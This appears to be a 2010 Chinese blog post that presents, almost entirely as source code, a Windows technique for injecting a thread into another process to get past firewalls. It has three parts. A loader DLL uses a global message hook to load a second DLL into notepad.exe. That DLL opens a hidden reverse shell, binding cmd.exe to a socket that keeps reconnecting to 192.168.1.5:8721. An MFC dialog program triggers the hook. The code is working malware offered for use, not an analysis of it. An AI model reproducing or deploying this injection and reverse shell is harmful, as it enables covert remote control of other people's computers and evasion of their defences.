vc++无进程式线程插入穿墙技术实现

加载模块核心源码

#include "Loader.h"

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
 hinst = hinstDLL;

 switch(fdwReason)
 {
 case DLL_PROCESS_ATTACH:
  //MessageBox(NULL,"DLL_PROCESS_ATTACH","",MB_OK);
  //SetHook();
  break;
 case DLL_THREAD_ATTACH:
  //MessageBox(NULL,"DLL_THREAD_ATTACH","",MB_OK);
  break;
 case DLL_THREAD_DETACH:
  //MessageBox(NULL,"DLL_THREAD_DETACH","",MB_OK);
  break;
 case DLL_PROCESS_DETACH:
  //MessageBox(NULL,"DLL_PROCESS_DETACH","",MB_OK);
  //UnHook();
  break;
 default:
  //MessageBox(NULL,"Default","",MB_OK);
  break;
 }
 return TRUE;
}

void SetHook(HWND hWnd)
{
 hHook = NULL;
 m_hWnd = hWnd;

 hHook = SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,hinst,0);
 if (hHook == 0)
 {
  MessageBox(NULL,"Hook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
 }
}

void UnHook()
{
 BOOL ret = UnhookWindowsHookEx(hHook);
 if (TRUE != ret)
 {
  MessageBox(NULL,"UnHook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
 }
}

LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam,LPARAM lParam)
{
 CallNextHookEx(hHook,code,wParam,lParam);

 static bool old = false;
 char buffer[1000];
 memset(buffer,0,1000);
 GetModuleFileName(0,buffer,1000);

 char *InsertName = _strupr(_strdup("notepad.exe"));
 char *CurrentName = _strupr(_strdup(buffer));

 if (strstr(CurrentName,InsertName) != NULL && old == false)
 {
  old = true;
  HMODULE hDll = NULL;
  hDll = LoadLibrary("E:\\Microsoft Visual Studio\\系统工程\\线程插入技术\\三级跳技术\\Insert\\Debug\\Insert.dll");
  if (hDll == NULL)
  {
   MessageBox(NULL,"Insert failed!","",MB_OK|MB_ICONERROR);
  }
  typedef void (*RUN)(HWND);
  RUN Run = (RUN)GetProcAddress(hDll,"Run");
  Run(m_hWnd);
 }

 return 1;

 return TRUE;
}

插入模块核心源码

#include "Insert.h"

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
 switch(fdwReason)
 {
 case DLL_PROCESS_ATTACH:
  break;
 case DLL_THREAD_ATTACH:
  break;
 case DLL_THREAD_DETACH:
  break;
 case DLL_PROCESS_DETACH:
  ret = FALSE;
  ret = TerminateThread(hThread,0);
  if (ret == 0)
   MessageBox(NULL,"Terminate Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
  break;
 default:
  break;
 }
 return TRUE;
}

void Run(HWND hWnd)
{
 hThread = NULL;
 ::SendMessage(hWnd,WM_CLOSE,0,0);
 hThread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
 if (hThread == 0)
  MessageBox(NULL,"Create Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
}

DWORD WINAPI ThreadProc(
  LPVOID lpParameter
)
{
 WSADATA wsa;
 WSAStartup(MAKEWORD(2,0),&wsa);

 SOCKET sock;
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 sockaddr_in addr;

 memset(&addr,0,sizeof(addr));
 memset(&pi,0,sizeof(pi));
 memset(&si,0,sizeof(si));

 addr.sin_family = AF_INET;
 addr.sin_port = htons(8721);
 addr.sin_addr.S_un.S_addr = inet_addr("192.168.1.5");

 sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);

 while(1)
 { 
  sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
  while (0 != connect(sock,(sockaddr*)&addr,sizeof(addr)))
  {
  // MessageBox(0,"Connect failed!","Report",MB_OK|MB_ICONERROR);
   shutdown(sock,0);
   Sleep(5000);
  }
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.hStdInput = si.hStdError = si.hStdOutput = (void*)sock;
  si.wShowWindow = SW_HIDE;
  memset(&pi,0,sizeof(pi));
  BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true,0,NULL,NULL,&si,&pi);
  WaitForSingleObject(pi.hProcess,INFINITE);   
  closesocket(sock);
 }
 WSACleanup();
 return 1;
}

执行源码

// WinExeDlg.cpp : implementation file
//

#include "stdafx.h"
#include "WinExe.h"
#include "WinExeDlg.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

class CAboutDlg : public CDialog
{
public:
 CAboutDlg();

// Dialog Data
 //{{AFX_DATA(CAboutDlg)
 enum { IDD = IDD_ABOUTBOX };
 //}}AFX_DATA

 // ClassWizard generated virtual function overrides
 //{{AFX_VIRTUAL(CAboutDlg)
 protected:
 virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
 //}}AFX_VIRTUAL

// Implementation
protected:
 //{{AFX_MSG(CAboutDlg)
 //}}AFX_MSG
 DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
 //{{AFX_DATA_INIT(CAboutDlg)
 //}}AFX_DATA_INIT
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CAboutDlg)
 //}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
 //{{AFX_MSG_MAP(CAboutDlg)
  // No message handlers
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg dialog

CWinExeDlg::CWinExeDlg(CWnd* pParent /*=NULL*/)
 : CDialog(CWinExeDlg::IDD, pParent)
{
 //{{AFX_DATA_INIT(CWinExeDlg)
  // NOTE: the ClassWizard will add member initialization here
 //}}AFX_DATA_INIT
 
 h_Dll = NULL;

 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

void CWinExeDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CWinExeDlg)
  // NOTE: the ClassWizard will add DDX and DDV calls here
 //}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CWinExeDlg, CDialog)
 //{{AFX_MSG_MAP(CWinExeDlg)
 ON_WM_SYSCOMMAND()
 ON_WM_PAINT()
 ON_WM_QUERYDRAGICON()
 ON_BN_CLICKED(IDC_BTN_LOADER, OnBtnLoader)
 ON_WM_CLOSE()
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg message handlers

BOOL CWinExeDlg::OnInitDialog()
{
 CDialog::OnInitDialog();

 // Add "About..." menu item to system menu.

 // IDM_ABOUTBOX must be in the system command range.
 ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
 ASSERT(IDM_ABOUTBOX < 0xF000);

 CMenu* pSysMenu = GetSystemMenu(FALSE);
 if (pSysMenu != NULL)
 {
  CString strAboutMenu;
  strAboutMenu.LoadString(IDS_ABOUTBOX);
  if (!strAboutMenu.IsEmpty())
  {
   pSysMenu->AppendMenu(MF_SEPARATOR);
   pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
  }
 }

 // Set the icon for this dialog.  The framework does this automatically
 //  when the application's main window is not a dialog
 SetIcon(m_hIcon, TRUE);   // Set big icon
 SetIcon(m_hIcon, FALSE);  // Set small icon
 
 h_Dll = LoadLibrary("./../Loader/Debug/Loader.dll");
 if (h_Dll == 0)
 {
  MessageBox("Load Library Error");
  return false;
 }
 
 return TRUE;  // return TRUE  unless you set the focus to a control
}

void CWinExeDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
 if ((nID & 0xFFF0) == IDM_ABOUTBOX)
 {
  CAboutDlg dlgAbout;
  dlgAbout.DoModal();
 }
 else
 {
  CDialog::OnSysCommand(nID, lParam);
 }
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CWinExeDlg::OnPaint() 
{
 if (IsIconic())
 {
  CPaintDC dc(this); // device context for painting

  SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

  // Center icon in client rectangle
  int cxIcon = GetSystemMetrics(SM_CXICON);
  int cyIcon = GetSystemMetrics(SM_CYICON);
  CRect rect;
  GetClientRect(&rect);
  int x = (rect.Width() - cxIcon + 1) / 2;
  int y = (rect.Height() - cyIcon + 1) / 2;

  // Draw the icon
  dc.DrawIcon(x, y, m_hIcon);
 }
 else
 {
  CDialog::OnPaint();
 }
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CWinExeDlg::OnQueryDragIcon()
{
 return (HCURSOR) m_hIcon;
}

void CWinExeDlg::OnBtnLoader() 
{
// ShellExecute(0,"open","about:blank",NULL,NULL,SW_HIDE);
// WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe about:blank",SW_HIDE);

 typedef void (*LOAD)(HWND);
 LOAD Proc = (LOAD)GetProcAddress(h_Dll,"SetHook");
 if (Proc == 0)
 {
  MessageBox("Get Proc failed");
  return;
 }
 Proc(m_hWnd);

}

void CWinExeDlg::OnClose() 
{
 typedef void (*UNLOAD)(void);
 UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll,"UnHook");
 if (Proc == 0)
 {
  MessageBox("Get Proc failed");
  return;
 }
 Proc();
 
 FreeLibrary(h_Dll);
 CDialog::OnClose();
}
posted on 2010-05-30 22:02  carekee  阅读(391)  评论(0编辑  收藏  举报